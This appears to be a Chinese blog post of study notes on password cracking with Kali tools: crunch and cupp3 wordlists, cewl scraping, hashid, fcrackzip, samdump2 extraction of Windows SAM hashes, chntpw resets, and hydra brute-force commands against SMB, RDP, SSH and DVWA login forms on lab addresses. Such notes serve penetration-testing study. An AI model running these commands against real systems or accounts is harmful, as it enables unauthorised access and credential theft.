用户口令审计1

目录

crunch_创建字典工具

wordlist——kali内建字典

hashid/hash-identifier

fcrackzip-ZIP压缩文件口令审计

cupp3_cewl_fab-cewl-定制字典

cupp3

cewl

samdump2-Windows口令摘要

​chntpw-Windows口令修改

hydra

pw-inspector-口令过滤


 

crunch_创建字典工具

目标系统实施了强安全措施

  • 安装了所有补丁、无任何已知漏洞

获取目标系统登录凭据

  • 不会触发系统报警

身份认证

  • 你知道什么(账号密码、pin、passphrase )
  • 你有什么(令牌、token、key、 证书、密宝、手机)
  • 你是谁(指纹、视网膜、虹膜、掌纹、声纹、面部识别)
  • 以上方法结合使用(多因素身份认证)

密码破解方法

  • 人工猜解
  • 基于字典暴力破解(主流)
  • 键盘空间字符暴破(困难)

字典

  • 来自互联网信息泄漏
  • 基于密码构成规则生成的字符组合文件
  • 一个好的字典是破解成败的关键
crunch < min-len> <max-len> [< charset string>] [options] <charset string>默认是小写字符
-f指定字符集文件
/usr/share/crunch/charset.lst    #按照小写、大写、数字、符号顺序
-b按大小分割字典文件(kb/kib、mb/mib、gb/gib )
-c按行数分割字典文件
以上两个参数必须与-o START结合使用
-d同一字符连贯出现数量
-s起始密码字符
-e结束密码字符
crunch 1 5 0123456789 -o pass.txt        
crunch 7 7 0123456789 -o START -b 20mb        #20mb一个文件,分块存储
crunch 6 6  0123456789 -o START -c 10000      #每10000条存储为一个文件
crunch 3 3 0123456789 -d 2                    #同样的字符出现不能超过2次
crunch 5 5 0123456789 -s 20000 -e 20100       #20000开始,20100结束

crunch 1 1 -p 1234           #最大、最小字符长度失效,但必须存在,与-s参数不兼容
crunch 1 1 -p abc def 123    #-p参数指定基本字符串
crunch 1 1 -q a.txt          #a.txt内容为abc def 123 效果和上边的一样

crunch 5 5 -t ddd%% -p dog cat bird         #结合使用
crunch 5 5 -d 2@ -t @@@%%                   #小写字母出现不能超过2次
crunch 2 4 0123456789|aircrack-ng a.cap -e MyESSID -w - #管道符进行破解,随时生成随时破解



more /usr/share/crunch/charset.lst     #crunch的字符集
crunch 5 5 -f /usr/share/crunch/charset.lst numeric    #指定字符集内的内容生成字典

crunch字典组成规则
crunch 6 6 -t @,%%good
@    小写字母lalpha
,   大写字母ualpha
%    数字numeric
^    特殊符号symbols

输出文件压缩
crunch 4 4 -t @,%^ -o 1.txt -z 7z
其他压缩格式: gzip、bzip2、 lzma
7z压缩比率最大

 

wordlist——kali内建字典

└──╼ #tree /usr/share/wordlists/
/usr/share/wordlists/
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt.gz
└── wfuzz -> /usr/share/wfuzz/wordlist

hashid/hash-identifier

加密算法

  • 对称
  • 非对称
  • 单向(HASH)
  • 单向加密
    • 反向运算结果不唯一
    • 被认为不可能解密
    • 碰撞爆破
    • MD2、MD4、MD5、SHA1、 SHA256、 SHA512.
hashid可识别约210种HASH算法类型
hashid 5f4dcc3b5aa765d61d8327deb882cf99
-e    显示包括加盐的HASH算法
-m    显示对应的hashcat模式编号
-j    显示对应的JohnTheRipper格式名称

加盐
盐是系统产生的随机数据
用于抵抗预算HASH表的密码爆破攻击
与某些加密技术中的nonce类似
保存在数据库中的用户密码应加盐

 

fcrackzip-ZIP压缩文件口令审计

破解ZIP加密文件密码
加密文件
zip --password password secure.zip file.txt
zip -e secure.zip file.txt
解密文件
unzip secure.zip


暴力破解
fcrackzip -b -c 'a1' -l 1-5 -u secure.zip
-b    #brute force
-c    #指定字符集(a、A、1、!、:),a1代表小写字母和数字组合,!为特殊字符
-l    #密码长度
-u    #过滤错误密码

字典破解
fcrackzip -D -p pass.txt -u 1.zip 
-D    #字典破解模式
-P    #字典文件名

cupp3_cewl_fab-cewl-定制字典

cupp3

Cupp3
根据个人信息生成专属密码字典,姓名、昵称、生日、父母、宠物、爱好、常用词
cupp3 -l             #下载字典文件
cupp3 -w dict.txt    #基于已有字典演化生成增强字典
cupp3 -i             #交互式提供组成密码的元数据信息

leet mode
1>1、a→@、e→3、t→7、0→0、s→$、1337

cewl

通过站点信息爬取构造用户名/密码的字符串

cewl https://www.xxx.com -d 1 -m 3 -w a.txt -k -c -e --email_file e.txt -a --meta_file m.txt

-d    #爬网深度
-m    #最小单词长度( --with-numbers包含数字)
-o    #爬外站
-c    #单词计数
-e    #收集邮箱地址(作为用户名)
-a    #收集元数据(author/creator ) , 作为用户名
-u    #User Agent (--header,--cookie= )
--auth type        #身份认证方法( Digest / basic )
--auth user        #用户名
--auth pass        #密码
--proxy_host       #代理服务器地址
--proxy_port       #代理端口
--proxy_username   #代理帐号
--proxy_password   #代理密码

fab-cewl
与cewl相同技术获取author/creator元数据
Office 2007 / PDF

samdump2-Windows口令摘要

  • Windows系统帐号SAM数据库
    • 存放用户名+密文形式的密码( HASH )
    • 获得密码HASH则可进行暴力破解
    • c:\windows\system32\config\
  • samdump2 SYSTEM SAM
  • LMHASH / NTLMHASH
在win7虚拟机插入kali镜像,重启系统,进入kali
fdisk -l
mount /dev/sda2 /mnt/

cd /mnt/Windows/System32/config
samdump2 SYSTEM SAM

 

 

 

chntpw-Windows口令修改

  • 修改或清空密码
  • SAM用户帐号数据库
  • http:/ /www.chntpw.com/
    • CD / USB镜像文件
    • Kali中默认集成
    • 包含无密码重置工具的Windows密码重置
Kali Linux Live引导电脑
修改帐号密码
chntpw -l SAM    列出SAM文件中的所有用户并退出
chntpw -i SAM    互动菜单系统

 

hydra

  • 在线密码破解工具
  • 支持多种常见协议(身份认证)
    • 每种协议有不同的身份认证数据提交格式
    • 根据提交数据的返回信息判断认证成功与否
    • adam6500 asterisk cisco cisco-enable CVS firebird ftp ftps http[s]-{headlget|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram)digest}md5][s] mssqlmysql nntp oracle -listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey SVn teamspeak telnet[s] vmauthd vnc xmpp
hydra -l [user] -p [pass] [service://server[:PORT][/OPT]]
hydra -l user -p password ftp://1.1.1.1.2121
hydra -L user.txt -P pass.txt smb://1.1.1.0/24
hydra -l user -P pass.txt -M targets.txt ssh
hydra -C cred.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
-C:login:pass
hydra -U pop3s    #查询模块可用选项

 

hydra -l administrator -P rockyou.txt smb://192.168.0.128    #对win2003的密码破解
hydra -l administrator -P rockyou.txt rdp://192.168.0.128    #rdp远程桌面破解

-R         继续之前未完成的破解任务( hydra.restore )
-I         重新开始拉描(忽略hydra.restore )
-S         执行SSL连接(-O使用过时的SSLv2/v3)
-e nsr     n空密码/s用户名作密码/r翻转的用户名做密码
-u         循环用户(默认循环密码)
-o         结果输出到文件
-Vv        详细信息

实时生成密码字典
-x MIN:MAX:CHARSET (小写a/大写A/数字1)
-x 3:5:aA1  
-x 5:5:/%,-.

hydra -l administrator -x 3:5:1 -I smb://192.168.0.128 -Vv


-f/-F    成功退出(-f per host、-F global )
-t/-T    每主机并发连接数/全局并发连接数
-c       登录请求延时
-4/-6    IPv4/v6
-V/-v    详细信息/每次登录
图形化工具xhydra
基于表单的WEB应用程序密码破解
hydra -l admin -P rockyou.txt  http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:S=index.php" 192.168.0.108 vV

S=index.ph    p#S成功、F失败
C=/page/cookie:H='UA:firefox' #指定cookie获取页面和http头

hydra -U http-post-form    查看模块参数

 

pw-inspector-口令过滤

字典是密码破解成败的关键
了解密码规则可以提高密码破解效率,按照指定规则对字典进行筛选
pw-inspector -i i.txt -o o.txt -m 3 -M 5 -u -n -p -s -c 2

-l    小写字母
-u    大写字母
-n    数字
-p    可打印字符
-s    特殊符号
-c    密码最少包含集中字符集

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值